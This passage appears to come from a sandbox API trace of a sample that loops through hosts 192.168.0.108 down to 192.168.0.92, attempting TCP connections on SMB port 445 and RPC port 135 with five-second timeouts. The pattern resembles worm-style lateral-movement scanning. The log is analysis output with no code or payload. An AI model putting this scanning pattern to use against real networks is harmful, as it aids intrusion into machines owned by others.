sin_port=0x1bd, sin_addr="192.168.0.108"), namelen=16) returned -1 [0091.522] WSAGetLastError () returned 10035 [0091.522] select (in: nfds=0, readfds=0x0, writefds=0xf4afd08, exceptfds=0xf4afe10, timeout=0xf4aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf4afd08, exceptfds=0xf4afe10) returned 0 [0096.574] closesocket (s=0xdf8) returned 0 [0096.575] inet_addr (cp="192.168.0.108") returned 0x6c00a8c0 [0096.575] htons (hostshort=0x87) returned 0x8700 [0096.575] socket (af=2, type=1, protocol=6) returned 0xdf8 [0096.575] ioctlsocket (in: s=0xdf8, cmd=-2147195266, argp=0xf4aff34 | out: argp=0xf4aff34) returned 0 [0096.575] connect (s=0xdf8, name=0xf4aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.108"), namelen=16) returned -1 [0096.576] WSAGetLastError () returned 10035 [0096.576] select (in: nfds=0, readfds=0x0, writefds=0xf4afd08, exceptfds=0xf4afe10, timeout=0xf4aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf4afd08, exceptfds=0xf4afe10) returned 0 [0101.763] closesocket (s=0xdf8) returned 0 [0101.764] RtlExitUserThread (Status=0x0) Thread: id = 205 os_tid = 0xd20 [0091.523] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072d98 [0091.523] free (_Block=0x2072d98) [0091.523] inet_addr (cp="192.168.0.107") returned 0x6b00a8c0 [0091.523] htons (hostshort=0x1bd) returned 0xbd01 [0091.523] socket (af=2, type=1, protocol=6) returned 0xe04 [0091.523] ioctlsocket (in: s=0xe04, cmd=-2147195266, argp=0xf5eff34 | out: argp=0xf5eff34) returned 0 [0091.523] connect (s=0xe04, name=0xf5eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.107"), namelen=16) returned -1 [0091.524] WSAGetLastError () returned 10035 [0091.524] select (in: nfds=0, readfds=0x0, writefds=0xf5efd08, exceptfds=0xf5efe10, timeout=0xf5eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf5efd08, exceptfds=0xf5efe10) returned 0 [0096.573] closesocket (s=0xe04) returned 0 [0096.574] inet_addr (cp="192.168.0.107") returned 0x6b00a8c0 [0096.574] htons (hostshort=0x87) returned 0x8700 [0096.574] socket (af=2, type=1, protocol=6) returned 0xe04 [0096.574] ioctlsocket (in: s=0xe04, cmd=-2147195266, argp=0xf5eff34 | out: argp=0xf5eff34) returned 0 [0096.574] connect (s=0xe04, name=0xf5eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.107"), namelen=16) returned -1 [0096.574] WSAGetLastError () returned 10035 [0096.574] select (in: nfds=0, readfds=0x0, writefds=0xf5efd08, exceptfds=0xf5efe10, timeout=0xf5eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf5efd08, exceptfds=0xf5efe10) returned 0 [0101.765] closesocket (s=0xe04) returned 0 [0101.765] RtlExitUserThread (Status=0x0) Thread: id = 206 os_tid = 0xd24 [0091.525] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072d70 [0091.525] free (_Block=0x2072d70) [0091.525] inet_addr (cp="192.168.0.106") returned 0x6a00a8c0 [0091.525] htons (hostshort=0x1bd) returned 0xbd01 [0091.525] socket (af=2, type=1, protocol=6) returned 0xe10 [0091.525] ioctlsocket (in: s=0xe10, cmd=-2147195266, argp=0xf72ff34 | out: argp=0xf72ff34) returned 0 [0091.525] connect (s=0xe10, name=0xf72ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.106"), namelen=16) returned -1 [0091.526] WSAGetLastError () returned 10035 [0091.526] select (in: nfds=0, readfds=0x0, writefds=0xf72fd08, exceptfds=0xf72fe10, timeout=0xf72ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf72fd08, exceptfds=0xf72fe10) returned 0 [0096.572] closesocket (s=0xe10) returned 0 [0096.572] inet_addr (cp="192.168.0.106") returned 0x6a00a8c0 [0096.572] htons (hostshort=0x87) returned 0x8700 [0096.572] socket (af=2, type=1, protocol=6) returned 0xe10 [0096.573] ioctlsocket (in: s=0xe10, cmd=-2147195266, argp=0xf72ff34 | out: argp=0xf72ff34) returned 0 [0096.573] connect (s=0xe10, name=0xf72ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.106"), namelen=16) returned -1 [0096.573] WSAGetLastError () returned 10035 [0096.573] select (in: nfds=0, readfds=0x0, writefds=0xf72fd08, exceptfds=0xf72fe10, timeout=0xf72ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf72fd08, exceptfds=0xf72fe10) returned 0 [0101.766] closesocket (s=0xe10) returned 0 [0101.767] RtlExitUserThread (Status=0x0) Thread: id = 207 os_tid = 0xd28 [0091.526] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072d48 [0091.526] free (_Block=0x2072d48) [0091.526] inet_addr (cp="192.168.0.105") returned 0x6900a8c0 [0091.526] htons (hostshort=0x1bd) returned 0xbd01 [0091.526] socket (af=2, type=1, protocol=6) returned 0xe1c [0091.528] ioctlsocket (in: s=0xe1c, cmd=-2147195266, argp=0xf86ff34 | out: argp=0xf86ff34) returned 0 [0091.529] connect (s=0xe1c, name=0xf86ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.105"), namelen=16) returned -1 [0091.529] WSAGetLastError () returned 10035 [0091.529] select (in: nfds=0, readfds=0x0, writefds=0xf86fd08, exceptfds=0xf86fe10, timeout=0xf86ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf86fd08, exceptfds=0xf86fe10) returned 0 [0096.569] closesocket (s=0xe1c) returned 0 [0096.570] inet_addr (cp="192.168.0.105") returned 0x6900a8c0 [0096.570] htons (hostshort=0x87) returned 0x8700 [0096.570] socket (af=2, type=1, protocol=6) returned 0xe1c [0096.571] ioctlsocket (in: s=0xe1c, cmd=-2147195266, argp=0xf86ff34 | out: argp=0xf86ff34) returned 0 [0096.571] connect (s=0xe1c, name=0xf86ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.105"), namelen=16) returned -1 [0096.572] WSAGetLastError () returned 10035 [0096.572] select (in: nfds=0, readfds=0x0, writefds=0xf86fd08, exceptfds=0xf86fe10, timeout=0xf86ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf86fd08, exceptfds=0xf86fe10) returned 0 [0101.768] closesocket (s=0xe1c) returned 0 [0101.769] RtlExitUserThread (Status=0x0) Thread: id = 208 os_tid = 0xd2c [0091.530] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072d20 [0091.530] free (_Block=0x2072d20) [0091.530] inet_addr (cp="192.168.0.104") returned 0x6800a8c0 [0091.530] htons (hostshort=0x1bd) returned 0xbd01 [0091.530] socket (af=2, type=1, protocol=6) returned 0xe28 [0091.530] ioctlsocket (in: s=0xe28, cmd=-2147195266, argp=0xf9aff34 | out: argp=0xf9aff34) returned 0 [0091.530] connect (s=0xe28, name=0xf9aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.104"), namelen=16) returned -1 [0091.531] WSAGetLastError () returned 10035 [0091.531] select (in: nfds=0, readfds=0x0, writefds=0xf9afd08, exceptfds=0xf9afe10, timeout=0xf9aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf9afd08, exceptfds=0xf9afe10) returned 0 [0096.568] closesocket (s=0xe28) returned 0 [0096.568] inet_addr (cp="192.168.0.104") returned 0x6800a8c0 [0096.568] htons (hostshort=0x87) returned 0x8700 [0096.568] socket (af=2, type=1, protocol=6) returned 0xe28 [0096.569] ioctlsocket (in: s=0xe28, cmd=-2147195266, argp=0xf9aff34 | out: argp=0xf9aff34) returned 0 [0096.569] connect (s=0xe28, name=0xf9aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.104"), namelen=16) returned -1 [0096.569] WSAGetLastError () returned 10035 [0096.569] select (in: nfds=0, readfds=0x0, writefds=0xf9afd08, exceptfds=0xf9afe10, timeout=0xf9aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xf9afd08, exceptfds=0xf9afe10) returned 0 [0101.734] closesocket (s=0xe28) returned 0 [0101.735] RtlExitUserThread (Status=0x0) Thread: id = 209 os_tid = 0xd30 [0091.536] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072cf8 [0091.536] free (_Block=0x2072cf8) [0091.536] inet_addr (cp="192.168.0.103") returned 0x6700a8c0 [0091.536] htons (hostshort=0x1bd) returned 0xbd01 [0091.536] socket (af=2, type=1, protocol=6) returned 0xe34 [0091.536] ioctlsocket (in: s=0xe34, cmd=-2147195266, argp=0xfaeff34 | out: argp=0xfaeff34) returned 0 [0091.536] connect (s=0xe34, name=0xfaeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.103"), namelen=16) returned -1 [0091.537] WSAGetLastError () returned 10035 [0091.537] select (in: nfds=0, readfds=0x0, writefds=0xfaefd08, exceptfds=0xfaefe10, timeout=0xfaeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfaefd08, exceptfds=0xfaefe10) returned 0 [0096.582] closesocket (s=0xe34) returned 0 [0096.583] inet_addr (cp="192.168.0.103") returned 0x6700a8c0 [0096.583] htons (hostshort=0x87) returned 0x8700 [0096.583] socket (af=2, type=1, protocol=6) returned 0xe34 [0096.583] ioctlsocket (in: s=0xe34, cmd=-2147195266, argp=0xfaeff34 | out: argp=0xfaeff34) returned 0 [0096.583] connect (s=0xe34, name=0xfaeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.103"), namelen=16) returned -1 [0096.584] WSAGetLastError () returned 10035 [0096.584] select (in: nfds=0, readfds=0x0, writefds=0xfaefd08, exceptfds=0xfaefe10, timeout=0xfaeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfaefd08, exceptfds=0xfaefe10) returned 0 [0101.752] closesocket (s=0xe34) returned 0 [0101.753] RtlExitUserThread (Status=0x0) Thread: id = 210 os_tid = 0xd34 [0091.537] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072cd0 [0091.537] free (_Block=0x2072cd0) [0091.537] inet_addr (cp="192.168.0.102") returned 0x6600a8c0 [0091.537] htons (hostshort=0x1bd) returned 0xbd01 [0091.537] socket (af=2, type=1, protocol=6) returned 0xe40 [0091.538] ioctlsocket (in: s=0xe40, cmd=-2147195266, argp=0xfc2ff34 | out: argp=0xfc2ff34) returned 0 [0091.538] connect (s=0xe40, name=0xfc2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.102"), namelen=16) returned -1 [0091.538] WSAGetLastError () returned 10035 [0091.538] select (in: nfds=0, readfds=0x0, writefds=0xfc2fd08, exceptfds=0xfc2fe10, timeout=0xfc2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfc2fd08, exceptfds=0xfc2fe10) returned 0 [0096.581] closesocket (s=0xe40) returned 0 [0096.582] inet_addr (cp="192.168.0.102") returned 0x6600a8c0 [0096.582] htons (hostshort=0x87) returned 0x8700 [0096.582] socket (af=2, type=1, protocol=6) returned 0xe40 [0096.582] ioctlsocket (in: s=0xe40, cmd=-2147195266, argp=0xfc2ff34 | out: argp=0xfc2ff34) returned 0 [0096.582] connect (s=0xe40, name=0xfc2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.102"), namelen=16) returned -1 [0096.582] WSAGetLastError () returned 10035 [0096.582] select (in: nfds=0, readfds=0x0, writefds=0xfc2fd08, exceptfds=0xfc2fe10, timeout=0xfc2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfc2fd08, exceptfds=0xfc2fe10) returned 0 [0101.754] closesocket (s=0xe40) returned 0 [0101.755] RtlExitUserThread (Status=0x0) Thread: id = 211 os_tid = 0xd38 [0091.542] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072ca8 [0091.542] free (_Block=0x2072ca8) [0091.542] inet_addr (cp="192.168.0.101") returned 0x6500a8c0 [0091.542] htons (hostshort=0x1bd) returned 0xbd01 [0091.542] socket (af=2, type=1, protocol=6) returned 0xe4c [0091.542] ioctlsocket (in: s=0xe4c, cmd=-2147195266, argp=0xfd6ff34 | out: argp=0xfd6ff34) returned 0 [0091.542] connect (s=0xe4c, name=0xfd6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.101"), namelen=16) returned -1 [0091.543] WSAGetLastError () returned 10035 [0091.543] select (in: nfds=0, readfds=0x0, writefds=0xfd6fd08, exceptfds=0xfd6fe10, timeout=0xfd6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfd6fd08, exceptfds=0xfd6fe10) returned 0 [0096.580] closesocket (s=0xe4c) returned 0 [0096.580] inet_addr (cp="192.168.0.101") returned 0x6500a8c0 [0096.580] htons (hostshort=0x87) returned 0x8700 [0096.580] socket (af=2, type=1, protocol=6) returned 0xe4c [0096.581] ioctlsocket (in: s=0xe4c, cmd=-2147195266, argp=0xfd6ff34 | out: argp=0xfd6ff34) returned 0 [0096.581] connect (s=0xe4c, name=0xfd6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.101"), namelen=16) returned -1 [0096.581] WSAGetLastError () returned 10035 [0096.581] select (in: nfds=0, readfds=0x0, writefds=0xfd6fd08, exceptfds=0xfd6fe10, timeout=0xfd6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfd6fd08, exceptfds=0xfd6fe10) returned 0 [0101.756] closesocket (s=0xe4c) returned 0 [0101.757] RtlExitUserThread (Status=0x0) Thread: id = 212 os_tid = 0xd3c [0091.543] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072c80 [0091.543] free (_Block=0x2072c80) [0091.543] inet_addr (cp="192.168.0.100") returned 0x6400a8c0 [0091.543] htons (hostshort=0x1bd) returned 0xbd01 [0091.543] socket (af=2, type=1, protocol=6) returned 0xe58 [0091.544] ioctlsocket (in: s=0xe58, cmd=-2147195266, argp=0xfeaff34 | out: argp=0xfeaff34) returned 0 [0091.544] connect (s=0xe58, name=0xfeaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.100"), namelen=16) returned -1 [0091.544] WSAGetLastError () returned 10035 [0091.544] select (in: nfds=0, readfds=0x0, writefds=0xfeafd08, exceptfds=0xfeafe10, timeout=0xfeaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfeafd08, exceptfds=0xfeafe10) returned 0 [0096.578] closesocket (s=0xe58) returned 0 [0096.579] inet_addr (cp="192.168.0.100") returned 0x6400a8c0 [0096.579] htons (hostshort=0x87) returned 0x8700 [0096.579] socket (af=2, type=1, protocol=6) returned 0xe58 [0096.579] ioctlsocket (in: s=0xe58, cmd=-2147195266, argp=0xfeaff34 | out: argp=0xfeaff34) returned 0 [0096.579] connect (s=0xe58, name=0xfeaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.100"), namelen=16) returned -1 [0096.580] WSAGetLastError () returned 10035 [0096.580] select (in: nfds=0, readfds=0x0, writefds=0xfeafd08, exceptfds=0xfeafe10, timeout=0xfeaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xfeafd08, exceptfds=0xfeafe10) returned 0 [0101.758] closesocket (s=0xe58) returned 0 [0101.758] RtlExitUserThread (Status=0x0) Thread: id = 213 os_tid = 0xd40 [0091.545] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072c58 [0091.545] free (_Block=0x2072c58) [0091.545] inet_addr (cp="192.168.0.99") returned 0x6300a8c0 [0091.545] htons (hostshort=0x1bd) returned 0xbd01 [0091.545] socket (af=2, type=1, protocol=6) returned 0xe64 [0091.547] ioctlsocket (in: s=0xe64, cmd=-2147195266, argp=0xffeff34 | out: argp=0xffeff34) returned 0 [0091.547] connect (s=0xe64, name=0xffeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.99"), namelen=16) returned -1 [0091.550] WSAGetLastError () returned 10035 [0091.550] select (in: nfds=0, readfds=0x0, writefds=0xffefd08, exceptfds=0xffefe10, timeout=0xffeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xffefd08, exceptfds=0xffefe10) returned 0 [0096.591] closesocket (s=0xe64) returned 0 [0096.591] inet_addr (cp="192.168.0.99") returned 0x6300a8c0 [0096.591] htons (hostshort=0x87) returned 0x8700 [0096.591] socket (af=2, type=1, protocol=6) returned 0xe64 [0096.591] ioctlsocket (in: s=0xe64, cmd=-2147195266, argp=0xffeff34 | out: argp=0xffeff34) returned 0 [0096.591] connect (s=0xe64, name=0xffeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.99"), namelen=16) returned -1 [0096.592] WSAGetLastError () returned 10035 [0096.592] select (in: nfds=0, readfds=0x0, writefds=0xffefd08, exceptfds=0xffefe10, timeout=0xffeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xffefd08, exceptfds=0xffefe10) returned 0 [0101.777] closesocket (s=0xe64) returned 0 [0101.778] RtlExitUserThread (Status=0x0) Thread: id = 214 os_tid = 0xd44 [0091.551] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072c30 [0091.551] free (_Block=0x2072c30) [0091.551] inet_addr (cp="192.168.0.98") returned 0x6200a8c0 [0091.551] htons (hostshort=0x1bd) returned 0xbd01 [0091.551] socket (af=2, type=1, protocol=6) returned 0xe70 [0091.551] ioctlsocket (in: s=0xe70, cmd=-2147195266, argp=0x1012ff34 | out: argp=0x1012ff34) returned 0 [0091.551] connect (s=0xe70, name=0x1012ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.98"), namelen=16) returned -1 [0091.552] WSAGetLastError () returned 10035 [0091.552] select (in: nfds=0, readfds=0x0, writefds=0x1012fd08, exceptfds=0x1012fe10, timeout=0x1012ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1012fd08, exceptfds=0x1012fe10) returned 0 [0096.589] closesocket (s=0xe70) returned 0 [0096.590] inet_addr (cp="192.168.0.98") returned 0x6200a8c0 [0096.590] htons (hostshort=0x87) returned 0x8700 [0096.590] socket (af=2, type=1, protocol=6) returned 0xe70 [0096.590] ioctlsocket (in: s=0xe70, cmd=-2147195266, argp=0x1012ff34 | out: argp=0x1012ff34) returned 0 [0096.590] connect (s=0xe70, name=0x1012ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.98"), namelen=16) returned -1 [0096.590] WSAGetLastError () returned 10035 [0096.590] select (in: nfds=0, readfds=0x0, writefds=0x1012fd08, exceptfds=0x1012fe10, timeout=0x1012ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1012fd08, exceptfds=0x1012fe10) returned 0 [0101.775] closesocket (s=0xe70) returned 0 [0101.776] RtlExitUserThread (Status=0x0) Thread: id = 215 os_tid = 0xd48 [0091.552] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072c08 [0091.552] free (_Block=0x2072c08) [0091.552] inet_addr (cp="192.168.0.97") returned 0x6100a8c0 [0091.552] htons (hostshort=0x1bd) returned 0xbd01 [0091.552] socket (af=2, type=1, protocol=6) returned 0xe7c [0091.553] ioctlsocket (in: s=0xe7c, cmd=-2147195266, argp=0x1026ff34 | out: argp=0x1026ff34) returned 0 [0091.553] connect (s=0xe7c, name=0x1026ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.97"), namelen=16) returned -1 [0091.553] WSAGetLastError () returned 10035 [0091.553] select (in: nfds=0, readfds=0x0, writefds=0x1026fd08, exceptfds=0x1026fe10, timeout=0x1026ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1026fd08, exceptfds=0x1026fe10) returned 0 [0096.588] closesocket (s=0xe7c) returned 0 [0096.588] inet_addr (cp="192.168.0.97") returned 0x6100a8c0 [0096.589] htons (hostshort=0x87) returned 0x8700 [0096.589] socket (af=2, type=1, protocol=6) returned 0xe7c [0096.589] ioctlsocket (in: s=0xe7c, cmd=-2147195266, argp=0x1026ff34 | out: argp=0x1026ff34) returned 0 [0096.589] connect (s=0xe7c, name=0x1026ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.97"), namelen=16) returned -1 [0096.589] WSAGetLastError () returned 10035 [0096.589] select (in: nfds=0, readfds=0x0, writefds=0x1026fd08, exceptfds=0x1026fe10, timeout=0x1026ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1026fd08, exceptfds=0x1026fe10) returned 0 [0101.773] closesocket (s=0xe7c) returned 0 [0101.774] RtlExitUserThread (Status=0x0) Thread: id = 216 os_tid = 0xd4c [0091.554] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072be0 [0091.554] free (_Block=0x2072be0) [0091.554] inet_addr (cp="192.168.0.96") returned 0x6000a8c0 [0091.554] htons (hostshort=0x1bd) returned 0xbd01 [0091.554] socket (af=2, type=1, protocol=6) returned 0xe88 [0091.554] ioctlsocket (in: s=0xe88, cmd=-2147195266, argp=0x103aff34 | out: argp=0x103aff34) returned 0 [0091.554] connect (s=0xe88, name=0x103aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.96"), namelen=16) returned -1 [0091.555] WSAGetLastError () returned 10035 [0091.555] select (in: nfds=0, readfds=0x0, writefds=0x103afd08, exceptfds=0x103afe10, timeout=0x103aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x103afd08, exceptfds=0x103afe10) returned 0 [0096.587] closesocket (s=0xe88) returned 0 [0096.587] inet_addr (cp="192.168.0.96") returned 0x6000a8c0 [0096.587] htons (hostshort=0x87) returned 0x8700 [0096.587] socket (af=2, type=1, protocol=6) returned 0xe88 [0096.588] ioctlsocket (in: s=0xe88, cmd=-2147195266, argp=0x103aff34 | out: argp=0x103aff34) returned 0 [0096.588] connect (s=0xe88, name=0x103aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.96"), namelen=16) returned -1 [0096.588] WSAGetLastError () returned 10035 [0096.588] select (in: nfds=0, readfds=0x0, writefds=0x103afd08, exceptfds=0x103afe10, timeout=0x103aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x103afd08, exceptfds=0x103afe10) returned 0 [0101.772] closesocket (s=0xe88) returned 0 [0101.772] RtlExitUserThread (Status=0x0) Thread: id = 217 os_tid = 0xd50 [0091.559] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072bb8 [0091.559] free (_Block=0x2072bb8) [0091.559] inet_addr (cp="192.168.0.95") returned 0x5f00a8c0 [0091.559] htons (hostshort=0x1bd) returned 0xbd01 [0091.559] socket (af=2, type=1, protocol=6) returned 0xe94 [0091.560] ioctlsocket (in: s=0xe94, cmd=-2147195266, argp=0x104eff34 | out: argp=0x104eff34) returned 0 [0091.560] connect (s=0xe94, name=0x104eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.95"), namelen=16) returned -1 [0091.560] WSAGetLastError () returned 10035 [0091.560] select (in: nfds=0, readfds=0x0, writefds=0x104efd08, exceptfds=0x104efe10, timeout=0x104eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x104efd08, exceptfds=0x104efe10) returned 0 [0096.585] closesocket (s=0xe94) returned 0 [0096.586] inet_addr (cp="192.168.0.95") returned 0x5f00a8c0 [0096.586] htons (hostshort=0x87) returned 0x8700 [0096.586] socket (af=2, type=1, protocol=6) returned 0xe94 [0096.586] ioctlsocket (in: s=0xe94, cmd=-2147195266, argp=0x104eff34 | out: argp=0x104eff34) returned 0 [0096.586] connect (s=0xe94, name=0x104eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.95"), namelen=16) returned -1 [0096.586] WSAGetLastError () returned 10035 [0096.586] select (in: nfds=0, readfds=0x0, writefds=0x104efd08, exceptfds=0x104efe10, timeout=0x104eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x104efd08, exceptfds=0x104efe10) returned 0 [0101.770] closesocket (s=0xe94) returned 0 [0101.771] RtlExitUserThread (Status=0x0) Thread: id = 218 os_tid = 0xd54 [0091.561] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072b90 [0091.561] free (_Block=0x2072b90) [0091.561] inet_addr (cp="192.168.0.94") returned 0x5e00a8c0 [0091.561] htons (hostshort=0x1bd) returned 0xbd01 [0091.561] socket (af=2, type=1, protocol=6) returned 0xea0 [0091.561] ioctlsocket (in: s=0xea0, cmd=-2147195266, argp=0x1062ff34 | out: argp=0x1062ff34) returned 0 [0091.561] connect (s=0xea0, name=0x1062ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.94"), namelen=16) returned -1 [0091.562] WSAGetLastError () returned 10035 [0091.562] select (in: nfds=0, readfds=0x0, writefds=0x1062fd08, exceptfds=0x1062fe10, timeout=0x1062ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1062fd08, exceptfds=0x1062fe10) returned 0 [0096.584] closesocket (s=0xea0) returned 0 [0096.584] inet_addr (cp="192.168.0.94") returned 0x5e00a8c0 [0096.584] htons (hostshort=0x87) returned 0x8700 [0096.584] socket (af=2, type=1, protocol=6) returned 0xea0 [0096.585] ioctlsocket (in: s=0xea0, cmd=-2147195266, argp=0x1062ff34 | out: argp=0x1062ff34) returned 0 [0096.585] connect (s=0xea0, name=0x1062ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.94"), namelen=16) returned -1 [0096.585] WSAGetLastError () returned 10035 [0096.585] select (in: nfds=0, readfds=0x0, writefds=0x1062fd08, exceptfds=0x1062fe10, timeout=0x1062ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1062fd08, exceptfds=0x1062fe10) returned 0 [0101.751] closesocket (s=0xea0) returned 0 [0101.752] RtlExitUserThread (Status=0x0) Thread: id = 219 os_tid = 0xd58 [0091.562] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072b68 [0091.562] free (_Block=0x2072b68) [0091.562] inet_addr (cp="192.168.0.93") returned 0x5d00a8c0 [0091.562] htons (hostshort=0x1bd) returned 0xbd01 [0091.562] socket (af=2, type=1, protocol=6) returned 0xeac [0091.563] ioctlsocket (in: s=0xeac, cmd=-2147195266, argp=0x1076ff34 | out: argp=0x1076ff34) returned 0 [0091.563] connect (s=0xeac, name=0x1076ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.93"), namelen=16) returned -1 [0091.563] WSAGetLastError () returned 10035 [0091.563] select (in: nfds=0, readfds=0x0, writefds=0x1076fd08, exceptfds=0x1076fe10, timeout=0x1076ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1076fd08, exceptfds=0x1076fe10) returned 0 [0096.599] closesocket (s=0xeac) returned 0 [0096.600] inet_addr (cp="192.168.0.93") returned 0x5d00a8c0 [0096.600] htons (hostshort=0x87) returned 0x8700 [0096.600] socket (af=2, type=1, protocol=6) returned 0xeac [0096.600] ioctlsocket (in: s=0xeac, cmd=-2147195266, argp=0x1076ff34 | out: argp=0x1076ff34) returned 0 [0096.600] connect (s=0xeac, name=0x1076ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.93"), namelen=16) returned -1 [0096.600] WSAGetLastError () returned 10035 [0096.600] select (in: nfds=0, readfds=0x0, writefds=0x1076fd08, exceptfds=0x1076fe10, timeout=0x1076ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1076fd08, exceptfds=0x1076fe10) returned 0 [0101.804] closesocket (s=0xeac) returned 0 [0101.805] RtlExitUserThread (Status=0x0) Thread: id = 220 os_tid = 0xd5c [0091.564] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072b40 [0091.564] free (_Block=0x2072b40) [0091.564] inet_addr (cp="192.168.0.92") returned 0x5c00a8c0 [0091.564] htons (hostshort=0x1bd) returned 0xbd01 [0091.564] socket (af=2, type=1, protocol=6) returned 0xeb8 [0091.564] ioctlsocket (in: s=0xeb8, cmd=-2147195266, argp=0x108aff34 | out: argp=0x108aff34) returned 0 [0091.564] connect (s=0xeb8, name=0x108aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.92"), namelen=16) returned -1 [0091.566] WSAGetLastError () returned 10035 [0091.566] select (in: nfds=0, readfds=0x0, writefds=0x108afd08, exceptfds=0x108afe10, timeout=0x108aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x108afd08, exceptfds=0x108afe10) returned 0 [0096.598] closesocket (s=0xeb8) returned 0 [0096.599] inet_addr (cp="192.168.0.92") returned 0x5c00a8c0 [0096.599] htons (hostshort=0x87) returned 0x8700 [0096.599] socket (af=2, type=1, protocol=6) returned 0xeb8 [0096.599] ioctlsocket (in: s=0xeb8, cmd=-2147195266, argp=0x108aff34 | out: argp=0x108aff34) 